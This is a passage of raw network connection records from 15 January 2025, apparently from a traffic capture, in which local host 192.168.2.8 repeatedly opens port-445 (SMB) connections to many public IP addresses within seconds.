Jan 15, 2025 16:57:55.499294043 CET	445	50017	38.185.147.1	192.168.2.8
Jan 15, 2025 16:57:55.499341965 CET	50017	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:57:55.505173922 CET	445	50018	38.185.147.1	192.168.2.8
Jan 15, 2025 16:57:55.651917934 CET	50019	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:55.657645941 CET	445	50019	209.135.205.1	192.168.2.8
Jan 15, 2025 16:57:55.657752037 CET	50019	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:55.657800913 CET	50019	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:57:55.662647009 CET	445	50019	209.135.205.1	192.168.2.8
Jan 15, 2025 16:57:56.756516933 CET	445	49789	112.84.177.1	192.168.2.8
Jan 15, 2025 16:57:56.756671906 CET	49789	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:56.756783962 CET	49789	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:56.756886959 CET	49789	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:56.763418913 CET	445	49789	112.84.177.1	192.168.2.8
Jan 15, 2025 16:57:56.763432980 CET	445	49789	112.84.177.1	192.168.2.8
Jan 15, 2025 16:57:57.495898008 CET	50020	445	192.168.2.8	158.94.246.103
Jan 15, 2025 16:57:57.500854015 CET	445	50020	158.94.246.103	192.168.2.8
Jan 15, 2025 16:57:57.501055002 CET	50020	445	192.168.2.8	158.94.246.103
Jan 15, 2025 16:57:57.501055002 CET	50020	445	192.168.2.8	158.94.246.103
Jan 15, 2025 16:57:57.501127005 CET	50021	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:57:57.505916119 CET	445	50021	158.94.246.1	192.168.2.8
Jan 15, 2025 16:57:57.505983114 CET	50021	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:57:57.506011963 CET	50021	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:57:57.506184101 CET	50022	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:57:57.506371021 CET	445	50020	158.94.246.103	192.168.2.8
Jan 15, 2025 16:57:57.506438017 CET	50020	445	192.168.2.8	158.94.246.103
Jan 15, 2025 16:57:57.511001110 CET	445	50022	158.94.246.1	192.168.2.8
Jan 15, 2025 16:57:57.511055946 CET	445	50021	158.94.246.1	192.168.2.8
Jan 15, 2025 16:57:57.511059046 CET	50022	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:57:57.511082888 CET	50022	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:57:57.511104107 CET	50021	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:57:57.515868902 CET	445	50022	158.94.246.1	192.168.2.8
Jan 15, 2025 16:57:57.690279007 CET	50023	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:57.695193052 CET	445	50023	198.232.135.1	192.168.2.8
Jan 15, 2025 16:57:57.695271015 CET	50023	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:57.700252056 CET	50023	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:57:57.705063105 CET	445	50023	198.232.135.1	192.168.2.8
Jan 15, 2025 16:57:58.710954905 CET	445	49814	201.202.46.1	192.168.2.8
Jan 15, 2025 16:57:58.711095095 CET	49814	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:57:58.711218119 CET	49814	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:57:58.711289883 CET	49814	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:57:58.715990067 CET	445	49814	201.202.46.1	192.168.2.8
Jan 15, 2025 16:57:58.720864058 CET	445	49814	201.202.46.1	192.168.2.8
Jan 15, 2025 16:57:59.511548996 CET	50024	445	192.168.2.8	176.122.86.146
Jan 15, 2025 16:57:59.516486883 CET	445	50024	176.122.86.146	192.168.2.8
Jan 15, 2025 16:57:59.516578913 CET	50024	445	192.168.2.8	176.122.86.146
Jan 15, 2025 16:57:59.516657114 CET	50024	445	192.168.2.8	176.122.86.146
Jan 15, 2025 16:57:59.516762972 CET	50025	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:57:59.521552086 CET	445	50025	176.122.86.1	192.168.2.8
Jan 15, 2025 16:57:59.521614075 CET	445	50024	176.122.86.146	192.168.2.8
Jan 15, 2025 16:57:59.521627903 CET	50025	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:57:59.521676064 CET	50024	445	192.168.2.8	176.122.86.146
Jan 15, 2025 16:57:59.521753073 CET	50025	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:57:59.521944046 CET	50026	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:57:59.526779890 CET	445	50026	176.122.86.1	192.168.2.8
Jan 15, 2025 16:57:59.526791096 CET	445	50025	176.122.86.1	192.168.2.8
Jan 15, 2025 16:57:59.526840925 CET	50025	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:57:59.526859999 CET	50026	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:57:59.527013063 CET	50026	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:57:59.532139063 CET	445	50026	176.122.86.1	192.168.2.8
Jan 15, 2025 16:57:59.761435986 CET	50027	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:59.766509056 CET	445	50027	112.84.177.1	192.168.2.8
Jan 15, 2025 16:57:59.766604900 CET	50027	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:59.766654015 CET	50027	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:57:59.771486998 CET	445	50027	112.84.177.1	192.168.2.8
Jan 15, 2025 16:58:00.759284019 CET	445	49839	69.111.126.1	192.168.2.8
Jan 15, 2025 16:58:00.759366035 CET	49839	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:58:00.759442091 CET	49839	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:58:00.759500027 CET	49839	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:58:00.764278889 CET	445	49839	69.111.126.1	192.168.2.8
Jan 15, 2025 16:58:00.764288902 CET	445	49839	69.111.126.1	192.168.2.8
Jan 15, 2025 16:58:01.527306080 CET	50028	445	192.168.2.8	32.252.86.6
Jan 15, 2025 16:58:01.532242060 CET	445	50028	32.252.86.6	192.168.2.8
Jan 15, 2025 16:58:01.532332897 CET	50028	445	192.168.2.8	32.252.86.6
Jan 15, 2025 16:58:01.532402039 CET	50028	445	192.168.2.8	32.252.86.6
Jan 15, 2025 16:58:01.532506943 CET	50029	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:01.537300110 CET	445	50028	32.252.86.6	192.168.2.8
Jan 15, 2025 16:58:01.537328005 CET	445	50029	32.252.86.1	192.168.2.8
Jan 15, 2025 16:58:01.537355900 CET	50028	445	192.168.2.8	32.252.86.6
Jan 15, 2025 16:58:01.537395000 CET	50029	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:01.537434101 CET	50029	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:01.537599087 CET	50030	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:01.542377949 CET	445	50030	32.252.86.1	192.168.2.8
Jan 15, 2025 16:58:01.542435884 CET	50030	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:01.542450905 CET	50030	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:01.542709112 CET	445	50029	32.252.86.1	192.168.2.8
Jan 15, 2025 16:58:01.542762995 CET	50029	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:01.547224998 CET	445	50030	32.252.86.1	192.168.2.8
Jan 15, 2025 16:58:01.714879036 CET	50031	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:58:01.719789028 CET	445	50031	201.202.46.1	192.168.2.8
Jan 15, 2025 16:58:01.719872952 CET	50031	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:58:01.719903946 CET	50031	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:58:01.724689960 CET	445	50031	201.202.46.1	192.168.2.8
Jan 15, 2025 16:58:02.792926073 CET	445	49864	200.214.167.1	192.168.2.8
Jan 15, 2025 16:58:02.792995930 CET	49864	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:58:02.797883034 CET	49864	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:58:02.797929049 CET	49864	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:58:02.802841902 CET	445	49864	200.214.167.1	192.168.2.8
Jan 15, 2025 16:58:02.802879095 CET	445	49864	200.214.167.1	192.168.2.8
Jan 15, 2025 16:58:03.551973104 CET	50032	445	192.168.2.8	88.63.225.125
Jan 15, 2025 16:58:03.556956053 CET	445	50032	88.63.225.125	192.168.2.8
Jan 15, 2025 16:58:03.557039976 CET	50032	445	192.168.2.8	88.63.225.125
Jan 15, 2025 16:58:03.557126045 CET	50032	445	192.168.2.8	88.63.225.125
Jan 15, 2025 16:58:03.557285070 CET	50033	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:03.562182903 CET	445	50032	88.63.225.125	192.168.2.8
Jan 15, 2025 16:58:03.562222958 CET	445	50033	88.63.225.1	192.168.2.8
Jan 15, 2025 16:58:03.562252045 CET	50032	445	192.168.2.8	88.63.225.125
Jan 15, 2025 16:58:03.562302113 CET	50033	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:03.562365055 CET	50033	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:03.562649965 CET	50034	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:03.567229986 CET	445	50033	88.63.225.1	192.168.2.8
Jan 15, 2025 16:58:03.567291021 CET	50033	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:03.567456007 CET	445	50034	88.63.225.1	192.168.2.8
Jan 15, 2025 16:58:03.567507982 CET	50034	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:03.567532063 CET	50034	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:03.572272062 CET	445	50034	88.63.225.1	192.168.2.8
Jan 15, 2025 16:58:03.761389971 CET	50035	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:58:03.766367912 CET	445	50035	69.111.126.1	192.168.2.8
Jan 15, 2025 16:58:03.766453028 CET	50035	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:58:03.766508102 CET	50035	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:58:03.771328926 CET	445	50035	69.111.126.1	192.168.2.8
Jan 15, 2025 16:58:04.787882090 CET	445	49888	84.147.160.1	192.168.2.8
Jan 15, 2025 16:58:04.788156986 CET	49888	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:58:04.788157940 CET	49888	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:58:04.788157940 CET	49888	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:58:04.793045044 CET	445	49888	84.147.160.1	192.168.2.8
Jan 15, 2025 16:58:04.793061018 CET	445	49888	84.147.160.1	192.168.2.8
Jan 15, 2025 16:58:05.433342934 CET	50036	445	192.168.2.8	57.162.85.15
Jan 15, 2025 16:58:05.438497066 CET	445	50036	57.162.85.15	192.168.2.8
Jan 15, 2025 16:58:05.438584089 CET	50036	445	192.168.2.8	57.162.85.15
Jan 15, 2025 16:58:05.438697100 CET	50036	445	192.168.2.8	57.162.85.15
Jan 15, 2025 16:58:05.438810110 CET	50037	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:05.443603992 CET	445	50036	57.162.85.15	192.168.2.8
Jan 15, 2025 16:58:05.443676949 CET	50036	445	192.168.2.8	57.162.85.15
Jan 15, 2025 16:58:05.443701029 CET	445	50037	57.162.85.1	192.168.2.8
Jan 15, 2025 16:58:05.443764925 CET	50037	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:05.443820000 CET	50037	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:05.444000959 CET	50038	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:05.448762894 CET	445	50037	57.162.85.1	192.168.2.8
Jan 15, 2025 16:58:05.448818922 CET	445	50038	57.162.85.1	192.168.2.8
Jan 15, 2025 16:58:05.448826075 CET	50037	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:05.448880911 CET	50038	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:05.448909998 CET	50038	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:05.453797102 CET	445	50038	57.162.85.1	192.168.2.8
Jan 15, 2025 16:58:05.808027983 CET	50039	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:58:05.813433886 CET	445	50039	200.214.167.1	192.168.2.8
Jan 15, 2025 16:58:05.813512087 CET	50039	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:58:05.813611984 CET	50039	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:58:05.819003105 CET	445	50039	200.214.167.1	192.168.2.8
Jan 15, 2025 16:58:06.804866076 CET	445	49913	75.165.172.1	192.168.2.8
Jan 15, 2025 16:58:06.805038929 CET	49913	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:58:06.806579113 CET	49913	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:58:06.806632042 CET	49913	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:58:06.811463118 CET	445	49913	75.165.172.1	192.168.2.8
Jan 15, 2025 16:58:06.811472893 CET	445	49913	75.165.172.1	192.168.2.8
Jan 15, 2025 16:58:07.194464922 CET	50040	445	192.168.2.8	153.101.17.35
Jan 15, 2025 16:58:07.199558020 CET	445	50040	153.101.17.35	192.168.2.8
Jan 15, 2025 16:58:07.199640036 CET	50040	445	192.168.2.8	153.101.17.35
Jan 15, 2025 16:58:07.200445890 CET	50040	445	192.168.2.8	153.101.17.35
Jan 15, 2025 16:58:07.200604916 CET	50041	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:07.205516100 CET	445	50041	153.101.17.1	192.168.2.8
Jan 15, 2025 16:58:07.205599070 CET	50041	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:07.207653999 CET	445	50040	153.101.17.35	192.168.2.8
Jan 15, 2025 16:58:07.209244013 CET	445	50040	153.101.17.35	192.168.2.8
Jan 15, 2025 16:58:07.209306002 CET	50040	445	192.168.2.8	153.101.17.35
Jan 15, 2025 16:58:07.224458933 CET	50041	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:07.224699974 CET	50042	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:07.229371071 CET	445	50041	153.101.17.1	192.168.2.8
Jan 15, 2025 16:58:07.229437113 CET	50041	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:07.229573011 CET	445	50042	153.101.17.1	192.168.2.8
Jan 15, 2025 16:58:07.229638100 CET	50042	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:07.231707096 CET	50042	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:07.236586094 CET	445	50042	153.101.17.1	192.168.2.8
Jan 15, 2025 16:58:07.792459011 CET	50043	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:58:07.797503948 CET	445	50043	84.147.160.1	192.168.2.8
Jan 15, 2025 16:58:07.797602892 CET	50043	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:58:07.797632933 CET	50043	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:58:07.802434921 CET	445	50043	84.147.160.1	192.168.2.8
Jan 15, 2025 16:58:08.803726912 CET	445	49938	8.188.251.1	192.168.2.8
Jan 15, 2025 16:58:08.803924084 CET	49938	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:58:08.803924084 CET	49938	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:58:08.803924084 CET	49938	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:58:08.809001923 CET	445	49938	8.188.251.1	192.168.2.8
Jan 15, 2025 16:58:08.809032917 CET	445	49938	8.188.251.1	192.168.2.8
Jan 15, 2025 16:58:08.824017048 CET	50044	445	192.168.2.8	28.183.62.137
Jan 15, 2025 16:58:08.829591990 CET	445	50044	28.183.62.137	192.168.2.8
Jan 15, 2025 16:58:08.829685926 CET	50044	445	192.168.2.8	28.183.62.137
Jan 15, 2025 16:58:08.829777956 CET	50044	445	192.168.2.8	28.183.62.137
Jan 15, 2025 16:58:08.829917908 CET	50045	445	192.168.2.8	28.183.62.1
Jan 15, 2025 16:58:08.835001945 CET	445	50045	28.183.62.1	192.168.2.8
Jan 15, 2025 16:58:08.835078001 CET	50045	445	192.168.2.8	28.183.62.1
Jan 15, 2025 16:58:08.835125923 CET	50045	445	192.168.2.8	28.183.62.1
Jan 15, 2025 16:58:08.835293055 CET	50046	445	192.168.2.8	28.183.62.1
Jan 15, 2025 16:58:08.835413933 CET	445	50044	28.183.62.137	192.168.2.8
Jan 15, 2025 16:58:08.835474014 CET	50044	445	192.168.2.8	28.183.62.137
Jan 15, 2025 16:58:08.840450048 CET	445	50046	28.183.62.1	192.168.2.8
Jan 15, 2025 16:58:08.840513945 CET	50046	445	192.168.2.8	28.183.62.1
Jan 15, 2025 16:58:08.840544939 CET	50046	445	192.168.2.8	28.183.62.1
Jan 15, 2025 16:58:08.843343019 CET	445	50045	28.183.62.1	192.168.2.8
Jan 15, 2025 16:58:08.843409061 CET	50045	445	192.168.2.8	28.183.62.1
Jan 15, 2025 16:58:08.845834970 CET	445	50046	28.183.62.1	192.168.2.8
Jan 15, 2025 16:58:09.874392986 CET	50047	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:58:09.879470110 CET	445	50047	75.165.172.1	192.168.2.8
Jan 15, 2025 16:58:09.879554987 CET	50047	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:58:09.879614115 CET	50047	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:58:09.884421110 CET	445	50047	75.165.172.1	192.168.2.8
Jan 15, 2025 16:58:10.355282068 CET	50048	445	192.168.2.8	91.57.194.122
Jan 15, 2025 16:58:10.360485077 CET	445	50048	91.57.194.122	192.168.2.8
Jan 15, 2025 16:58:10.360671997 CET	50048	445	192.168.2.8	91.57.194.122
Jan 15, 2025 16:58:10.360760927 CET	50048	445	192.168.2.8	91.57.194.122
Jan 15, 2025 16:58:10.360909939 CET	50049	445	192.168.2.8	91.57.194.1
Jan 15, 2025 16:58:10.365725994 CET	445	50049	91.57.194.1	192.168.2.8
Jan 15, 2025 16:58:10.365812063 CET	50049	445	192.168.2.8	91.57.194.1
Jan 15, 2025 16:58:10.365880013 CET	50049	445	192.168.2.8	91.57.194.1
Jan 15, 2025 16:58:10.366122961 CET	50050	445	192.168.2.8	91.57.194.1
Jan 15, 2025 16:58:10.367618084 CET	445	50048	91.57.194.122	192.168.2.8
Jan 15, 2025 16:58:10.369611025 CET	445	50048	91.57.194.122	192.168.2.8
Jan 15, 2025 16:58:10.369687080 CET	50048	445	192.168.2.8	91.57.194.122
Jan 15, 2025 16:58:10.371056080 CET	445	50050	91.57.194.1	192.168.2.8
Jan 15, 2025 16:58:10.371129036 CET	50050	445	192.168.2.8	91.57.194.1
Jan 15, 2025 16:58:10.371172905 CET	50050	445	192.168.2.8	91.57.194.1
Jan 15, 2025 16:58:10.371607065 CET	445	50049	91.57.194.1	192.168.2.8
Jan 15, 2025 16:58:10.371989965 CET	445	50049	91.57.194.1	192.168.2.8
Jan 15, 2025 16:58:10.372041941 CET	50049	445	192.168.2.8	91.57.194.1
Jan 15, 2025 16:58:10.375977039 CET	445	50050	91.57.194.1	192.168.2.8
Jan 15, 2025 16:58:10.803478956 CET	445	49962	46.252.194.1	192.168.2.8
Jan 15, 2025 16:58:10.803575993 CET	49962	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:58:10.803612947 CET	49962	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:58:10.803684950 CET	49962	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:58:10.808567047 CET	445	49962	46.252.194.1	192.168.2.8
Jan 15, 2025 16:58:10.808599949 CET	445	49962	46.252.194.1	192.168.2.8
Jan 15, 2025 16:58:11.780072927 CET	50051	445	192.168.2.8	9.32.108.207
Jan 15, 2025 16:58:11.785181046 CET	445	50051	9.32.108.207	192.168.2.8
Jan 15, 2025 16:58:11.785255909 CET	50051	445	192.168.2.8	9.32.108.207
Jan 15, 2025 16:58:11.785325050 CET	50051	445	192.168.2.8	9.32.108.207
Jan 15, 2025 16:58:11.785485029 CET	50052	445	192.168.2.8	9.32.108.1
Jan 15, 2025 16:58:11.790440083 CET	445	50052	9.32.108.1	192.168.2.8
Jan 15, 2025 16:58:11.790456057 CET	445	50051	9.32.108.207	192.168.2.8
Jan 15, 2025 16:58:11.790572882 CET	50051	445	192.168.2.8	9.32.108.207
Jan 15, 2025 16:58:11.790575027 CET	50052	445	192.168.2.8	9.32.108.1
Jan 15, 2025 16:58:11.803527117 CET	50052	445	192.168.2.8	9.32.108.1
Jan 15, 2025 16:58:11.803908110 CET	50053	445	192.168.2.8	9.32.108.1
Jan 15, 2025 16:58:11.808490992 CET	445	50052	9.32.108.1	192.168.2.8
Jan 15, 2025 16:58:11.808845997 CET	445	50053	9.32.108.1	192.168.2.8
Jan 15, 2025 16:58:11.808898926 CET	50052	445	192.168.2.8	9.32.108.1
Jan 15, 2025 16:58:11.808933020 CET	50053	445	192.168.2.8	9.32.108.1
Jan 15, 2025 16:58:11.808975935 CET	50053	445	192.168.2.8	9.32.108.1
Jan 15, 2025 16:58:11.809086084 CET	50054	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:58:11.813832998 CET	445	50053	9.32.108.1	192.168.2.8
Jan 15, 2025 16:58:11.814006090 CET	445	50054	8.188.251.1	192.168.2.8
Jan 15, 2025 16:58:11.814203978 CET	50054	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:58:11.814228058 CET	50054	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:58:11.819010973 CET	445	50054	8.188.251.1	192.168.2.8
Jan 15, 2025 16:58:12.836009979 CET	445	49986	40.249.82.1	192.168.2.8
Jan 15, 2025 16:58:12.836146116 CET	49986	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:58:12.837529898 CET	49986	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:58:12.837583065 CET	49986	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:58:12.842412949 CET	445	49986	40.249.82.1	192.168.2.8
Jan 15, 2025 16:58:12.842446089 CET	445	49986	40.249.82.1	192.168.2.8
Jan 15, 2025 16:58:13.107979059 CET	50055	445	192.168.2.8	51.20.135.12
Jan 15, 2025 16:58:13.113078117 CET	445	50055	51.20.135.12	192.168.2.8
Jan 15, 2025 16:58:13.113157034 CET	50055	445	192.168.2.8	51.20.135.12
Jan 15, 2025 16:58:13.113290071 CET	50055	445	192.168.2.8	51.20.135.12
Jan 15, 2025 16:58:13.113409042 CET	50056	445	192.168.2.8	51.20.135.1
Jan 15, 2025 16:58:13.118285894 CET	445	50056	51.20.135.1	192.168.2.8
Jan 15, 2025 16:58:13.118319035 CET	445	50055	51.20.135.12	192.168.2.8
Jan 15, 2025 16:58:13.118345022 CET	50056	445	192.168.2.8	51.20.135.1
Jan 15, 2025 16:58:13.118391037 CET	50055	445	192.168.2.8	51.20.135.12
Jan 15, 2025 16:58:13.118484020 CET	50056	445	192.168.2.8	51.20.135.1
Jan 15, 2025 16:58:13.118729115 CET	50057	445	192.168.2.8	51.20.135.1
Jan 15, 2025 16:58:13.123349905 CET	445	50056	51.20.135.1	192.168.2.8
Jan 15, 2025 16:58:13.123410940 CET	50056	445	192.168.2.8	51.20.135.1
Jan 15, 2025 16:58:13.123644114 CET	445	50057	51.20.135.1	192.168.2.8
Jan 15, 2025 16:58:13.123711109 CET	50057	445	192.168.2.8	51.20.135.1
Jan 15, 2025 16:58:13.123754025 CET	50057	445	192.168.2.8	51.20.135.1
Jan 15, 2025 16:58:13.128539085 CET	445	50057	51.20.135.1	192.168.2.8
Jan 15, 2025 16:58:13.808146000 CET	50058	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:58:13.813818932 CET	445	50058	46.252.194.1	192.168.2.8
Jan 15, 2025 16:58:13.813939095 CET	50058	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:58:13.813970089 CET	50058	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:58:13.819238901 CET	445	50058	46.252.194.1	192.168.2.8
Jan 15, 2025 16:58:14.355353117 CET	50059	445	192.168.2.8	2.226.240.139
Jan 15, 2025 16:58:14.363471031 CET	445	50059	2.226.240.139	192.168.2.8
Jan 15, 2025 16:58:14.363656044 CET	50059	445	192.168.2.8	2.226.240.139
Jan 15, 2025 16:58:14.363738060 CET	50059	445	192.168.2.8	2.226.240.139
Jan 15, 2025 16:58:14.363879919 CET	50060	445	192.168.2.8	2.226.240.1
Jan 15, 2025 16:58:14.368741989 CET	445	50059	2.226.240.139	192.168.2.8
Jan 15, 2025 16:58:14.368761063 CET	445	50060	2.226.240.1	192.168.2.8
Jan 15, 2025 16:58:14.368798018 CET	50059	445	192.168.2.8	2.226.240.139
Jan 15, 2025 16:58:14.368840933 CET	50060	445	192.168.2.8	2.226.240.1
Jan 15, 2025 16:58:14.368892908 CET	50060	445	192.168.2.8	2.226.240.1
Jan 15, 2025 16:58:14.369117975 CET	50061	445	192.168.2.8	2.226.240.1
Jan 15, 2025 16:58:14.373852015 CET	445	50060	2.226.240.1	192.168.2.8
Jan 15, 2025 16:58:14.373909950 CET	50060	445	192.168.2.8	2.226.240.1
Jan 15, 2025 16:58:14.374025106 CET	445	50061	2.226.240.1	192.168.2.8
Jan 15, 2025 16:58:14.374085903 CET	50061	445	192.168.2.8	2.226.240.1
Jan 15, 2025 16:58:14.374125004 CET	50061	445	192.168.2.8	2.226.240.1
Jan 15, 2025 16:58:14.378952980 CET	445	50061	2.226.240.1	192.168.2.8
Jan 15, 2025 16:58:14.850737095 CET	445	50011	9.166.247.1	192.168.2.8
Jan 15, 2025 16:58:14.850817919 CET	50011	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:58:14.850920916 CET	50011	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:58:14.850920916 CET	50011	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:58:14.855854988 CET	445	50011	9.166.247.1	192.168.2.8
Jan 15, 2025 16:58:14.855886936 CET	445	50011	9.166.247.1	192.168.2.8
Jan 15, 2025 16:58:15.099777937 CET	445	50015	203.228.45.1	192.168.2.8
Jan 15, 2025 16:58:15.099894047 CET	50015	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:58:15.099982023 CET	50015	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:58:15.099982977 CET	50015	445	192.168.2.8	203.228.45.1
Jan 15, 2025 16:58:15.104859114 CET	445	50015	203.228.45.1	192.168.2.8
Jan 15, 2025 16:58:15.104871988 CET	445	50015	203.228.45.1	192.168.2.8
Jan 15, 2025 16:58:15.152050972 CET	50062	445	192.168.2.8	203.228.45.2
Jan 15, 2025 16:58:15.156879902 CET	445	50062	203.228.45.2	192.168.2.8
Jan 15, 2025 16:58:15.156954050 CET	50062	445	192.168.2.8	203.228.45.2
Jan 15, 2025 16:58:15.157006025 CET	50062	445	192.168.2.8	203.228.45.2
Jan 15, 2025 16:58:15.157377005 CET	50063	445	192.168.2.8	203.228.45.2
Jan 15, 2025 16:58:15.161864042 CET	445	50062	203.228.45.2	192.168.2.8
Jan 15, 2025 16:58:15.161911011 CET	50062	445	192.168.2.8	203.228.45.2
Jan 15, 2025 16:58:15.162168980 CET	445	50063	203.228.45.2	192.168.2.8
Jan 15, 2025 16:58:15.162564993 CET	50063	445	192.168.2.8	203.228.45.2
Jan 15, 2025 16:58:15.162564993 CET	50063	445	192.168.2.8	203.228.45.2
Jan 15, 2025 16:58:15.167304039 CET	445	50063	203.228.45.2	192.168.2.8
Jan 15, 2025 16:58:15.511724949 CET	50064	445	192.168.2.8	90.136.226.143
Jan 15, 2025 16:58:15.517082930 CET	445	50064	90.136.226.143	192.168.2.8
Jan 15, 2025 16:58:15.517226934 CET	50064	445	192.168.2.8	90.136.226.143
Jan 15, 2025 16:58:15.517302036 CET	50064	445	192.168.2.8	90.136.226.143
Jan 15, 2025 16:58:15.517366886 CET	50065	445	192.168.2.8	90.136.226.1
Jan 15, 2025 16:58:15.522747040 CET	445	50065	90.136.226.1	192.168.2.8
Jan 15, 2025 16:58:15.522841930 CET	50065	445	192.168.2.8	90.136.226.1
Jan 15, 2025 16:58:15.522841930 CET	50065	445	192.168.2.8	90.136.226.1
Jan 15, 2025 16:58:15.522886992 CET	445	50064	90.136.226.143	192.168.2.8
Jan 15, 2025 16:58:15.522937059 CET	50064	445	192.168.2.8	90.136.226.143
Jan 15, 2025 16:58:15.523108959 CET	50066	445	192.168.2.8	90.136.226.1
Jan 15, 2025 16:58:15.528150082 CET	445	50065	90.136.226.1	192.168.2.8
Jan 15, 2025 16:58:15.528166056 CET	445	50066	90.136.226.1	192.168.2.8
Jan 15, 2025 16:58:15.528203964 CET	50065	445	192.168.2.8	90.136.226.1
Jan 15, 2025 16:58:15.528238058 CET	50066	445	192.168.2.8	90.136.226.1
Jan 15, 2025 16:58:15.528275967 CET	50066	445	192.168.2.8	90.136.226.1
Jan 15, 2025 16:58:15.533046961 CET	445	50066	90.136.226.1	192.168.2.8
Jan 15, 2025 16:58:15.839405060 CET	50067	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:58:15.844520092 CET	445	50067	40.249.82.1	192.168.2.8
Jan 15, 2025 16:58:15.844626904 CET	50067	445	192.168.2.8	40.249.82.1
